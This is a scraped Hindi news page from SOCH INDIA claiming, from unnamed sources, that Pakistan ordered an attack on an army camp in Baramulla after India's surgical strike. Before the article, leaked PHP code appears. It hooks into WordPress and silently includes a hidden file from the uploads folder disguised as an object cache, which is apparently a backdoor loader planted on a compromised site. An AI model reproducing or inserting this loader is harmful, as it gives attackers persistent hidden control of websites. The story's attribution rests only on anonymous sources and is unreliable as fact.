add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Exclusive: बौखलाए पाकिस्तान ने बदले के लिए कराया बारामूला कैंप पर हमला: सूत्र – SOCH INDIA
Menu

राजनीति
Exclusive: बौखलाए पाकिस्तान ने बदले के लिए कराया बारामूला कैंप पर हमला: सूत्र

nobanner
Exclusive: बौखलाए पाकिस्तान ने बदले के लिए कराया बारामूला कैंप पर हमला: सूत्रभारत के सर्जिकल स्ट्राइक के बाद पाकिस्तान बदला लेने के लिए किसी भी स्तर तक गिरने को तैयार है. सीमा पर शांति का शिगूफा छोड़कर पाकिस्तान ने कल देर रात बारामूला में सेना के कैंप पर हमला कराया.

एबीपी न्यूज को सूत्रों से मिली जानकारी के मुताबिक बारामूला में आतंकी हमले से पहले कल शाम को पाकिस्तान के राष्ट्रीय सुरक्षा सलाहकार नासिर खान जंजुआ ने NSA अजित डोभाल को फोन किया था ताकि भारत का ध्यान भटकाया जा सके.

जंजुआ ने अजित डोभाल से कहा कि पाकिस्तान सीमा पर तनाव घटाना चाहता है. बाचतीच में भारत के सर्जिकल स्ट्राइक का जिक्र भी हुआ जिसपर अजित डोभाल ने कहा- भारत ने आतंकियों के लिए सर्जिकल स्ट्राइक किया था ना कि पाकिस्तानी सेना के खिलाफ.

अजित डोभाल और नासिर खान जंजुआ के बीच हुई इस बातचीत के कुछ घंटे बाद ही रात साढ़े दस बजे के करीब बारामूला में सेना के कैंप पर हमला हुआ जिसमें बीएसएफ का एक जवान शहीद हो गया.